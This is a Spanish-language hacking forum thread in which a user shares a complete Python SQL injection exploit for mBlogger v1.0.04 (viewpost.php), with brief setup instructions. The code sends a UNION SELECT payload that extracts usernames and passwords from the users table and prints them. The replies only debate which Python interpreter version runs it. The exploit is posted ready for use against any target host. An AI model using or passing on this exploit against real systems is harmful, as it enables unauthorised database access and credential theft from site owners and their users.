Mostrar mensajes previos
Ordenar por
por Skillmax Usa camisa de fuerza
mBlogger.. vulnerable a SQL, el exploit está en python, descargais su interprete, y después poneis el codigo en un bloc de notas con la extensión .py, miren la utilización del exploit


Imagen


Código: Seleccionar todo

#!/usr/bin/python
#
# Exploit Title:   mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit
# Date         :   31 August 2010
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/mblogger/
# Version      :   1.0.04
# Tested on    :   EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + viewpost.php => SQL Injection!!
#
# 30: $query = "SELECT id, name, subject, message, posted FROM posts WHERE
#     id = '$_GET[postID]'";
# 31: $result = mysql_query($query) or die(mysql_error());
# 32: while($row = mysql_fetch_array($result, MYSQL_ASSOC))
# 33: {
# 34:   echo "<div class='posttitle'>";
# 35:   echo "<h3>" . $row['subject'] . "</h3>";
# 36:   echo "</div>";
# 37:   echo "<div class='postbody'>";
# 38:   echo "<p> Posted by: " . $row['name'] . " on " . $row['posted'] . "</p>";
# 39:   echo "<p>" . $row['message'] . "</p>";
# 40:   echo "</div>";
# 41:   $postID = $row['id'];
# 42: }
#
 
import re
import sys
import http.client
 
 
def usage(prog):
    print('Usage  : ' + prog + ' <target> <path>\n')
    print('Example: ' + prog + ' localhost /mBlogger/')
    print('         ' + prog + ' www.target.com /complet/path/')
    return
 
 
def exploit(target, path):
    payload  = 'viewpost.php?postID=-1%27%20UNION%20SELECT%201,%27h4x0r%27,%27'
    payload += 'credentials%27,CONCAT(%27%3C1%3E%27,username,%27:%27,password,'
    payload += '%27%3C2%3E%27),%20NULL%20FROM%20users%20--%20%27'
 
    print('[+] Sending HTTP Request')
    con = http.client.HTTPConnection(target)
    con.request('GET', path + payload)
    res = con.getresponse()
 
    if res.status != 200:
        print('[!] HTTP GET Request Failed')
        exit(1)
 
    print('[+] Parsing HTTP Response')
    data = res.read().decode()
    pattern = re.compile(r"<1>(.+?)<2>", re.M)
     
    print('[+] Information Extracted:\n')
    credentials = pattern.findall(data)
    for element in credentials:
        print(element)
     
    return
 
 
 
print('\n+-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (viewpost.php) SQL Injection Exploit by Ptrace Security    |')
print('+-----------------------------------------------------------------------------+\n')
 
if len(sys.argv) != 3:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1], sys.argv[2])
 
exit(0)

Cualquier cosa me avisen hermanos... os dejo el interprete.


[Enlace externo eliminado para invitados]


[Enlace externo eliminado para invitados]


por Skillmax Usa camisa de fuerza
Fantasma17 escribió:Si está en python porque dejas el interprete de perl ?

Sí gracias por avisar me equivoqué , aquí está el otro:

[Enlace externo eliminado para invitados]
por Word Se conecta desde un manicomio
Skillmax escribió:
Fantasma17 escribió:Si está en python porque dejas el interprete de perl ?

Sí gracias por avisar me equivoqué , aquí está el otro:

[Enlace externo eliminado para invitados]
Te equivocas otra vez , el interpetre necesario es para la version 3.0 , como ves utiliza print como funcion ....
por Word Se conecta desde un manicomio
[Enlace externo eliminado para invitados] (Mira el apartado de print )
[Enlace externo eliminado para invitados] ... on-2x.html

La version 2.7 esta hecha para "allanar" el camino a la version 3.0 y supongo que por eso la acepta pero talvez tengas algunos problemas asi que utilizando la 3.0 te aseguras de que te funcionara todo, ya que tambien acepta la forma de la 2.x
por Skillmax Usa camisa de fuerza
Gracias por los links, yo no manejo el python, manejo el perl.. por eso no sé de python.. la version 2.7 me va sin problemas.
por $DoC Administrador
muy bueno Skillmax, cuando tenga tiempo le pego una miradita

saludos!!
Soy un camaleón, en tu cama, leona ♪
Temas similares
SQL INJECTION por rst4s en Dudas y Preguntas
INF Script Injection Backdoors por xrahitel en Manuales y Tutoriales
VBA Macro Remote Template Injection por xrahitel en Manuales y Tutoriales
Links sobre el tema
Variantes de tema
Responder

Volver a “Exploits”